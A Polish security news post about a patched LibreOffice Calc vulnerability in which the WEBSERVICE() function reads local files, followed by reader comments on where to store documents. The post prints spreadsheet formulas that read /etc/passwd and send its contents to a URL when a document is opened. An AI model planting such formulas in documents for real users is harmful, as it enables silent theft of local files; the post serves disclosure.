LibreOffice: można pobierać pliki z dysku ofiary. Wystarczy, że otworzy ona odpowiedni dokument.

10 lutego 2018, 18:26 | W biegu | komentarzy 5
: oglądaj sekurakowe live-streamy o bezpieczeństwie IT.

Właśnie załatano podatność, wykorzystującą prostą funkcję =WEBSERVICE()

LibreOffice Calc supports a WEBSERVICE function to obtain data by URL. Vulnerable versions of LibreOffice allow WEBSERVICE to take a local file URL (e.g file://) which can be used to inject local files into the spreadsheet without warning the user.

W pakiecie MS Office istnieje taka sama funkcja, ale… nie pozwala ona na odczyt lokalnych plików. W przypadku Libre Office jest to banalne=WEBSERVICE("/etc/passwd")  Podobnie proste jest wysłanie zawartości pliku pod konkretny URL: =WEBSERVICE("http://localhost:6000/?q=" & WEBSERVICE("/etc/passwd")) Wystarczy, że użytkownik otworzy odpowiedni plik Libre Office. Podatność załatano w wersjach: 5.4.5 / 6.0.1

–ms

 

Spodobał Ci się wpis? Podziel się nim ze znajomymi:Komentarze

 1. Tomasz21.

  Witam; A kto trzyma ważne dokumenty na Pc-cie? Przecież to jest tylko urządzenie do pracy; Mądry przechowuje materiały gdzie indziej. Sprzęt do przechowywania jest przecież tani; w czym problem? Czyżby problemem był brak wiedzy? Pozdrawiam.
  Ps. To są podstawy,wiedzy z informatyki.

  Odpowiedz
  • oi

   i twierdzisz, że nic wartego uwagi nie znajdę na twoim PC? ;)

   Odpowiedz
 2. norbert

  > Witam; A kto trzyma ważne dokumenty na Pc-cie? Przecież
  > to jest tylko urządzenie do pracy; Mądry przechowuje
  > materiały gdzie indziej.

  Właśnie na PC-ie się pracuje nad dokumentem, nie sądzisz? Nawet, jeśli się go potem przechowuje na dysku zewnętrznym czy gdzie tam jeszcze.

  Odpowiedz
 3. Michał

  kto trzyma ważne dokumenty na Pc-cie? Większość… w domu. Sprzęt do przechowywania danych wbrew pozorom nie jest tani, no chyba, że się kupuje tylko dla sztuki, a i ten trzeba skonfigurować. Przypadki podatności w NAS-ach też się są, chmury nie każdy potrafi rozważnie używać (bye bye prywatność). Co innego firmy a co innego użytkownicy domowi.

  Odpowiedz
 4. Radek

  Ja widać mądry nie jestem i nie znam podstaw.
  Możesz napisać coś więcej, gdzie przechowywać dokumenty czy zdjęcia?

  Radek

  Odpowiedz

Odpowiedz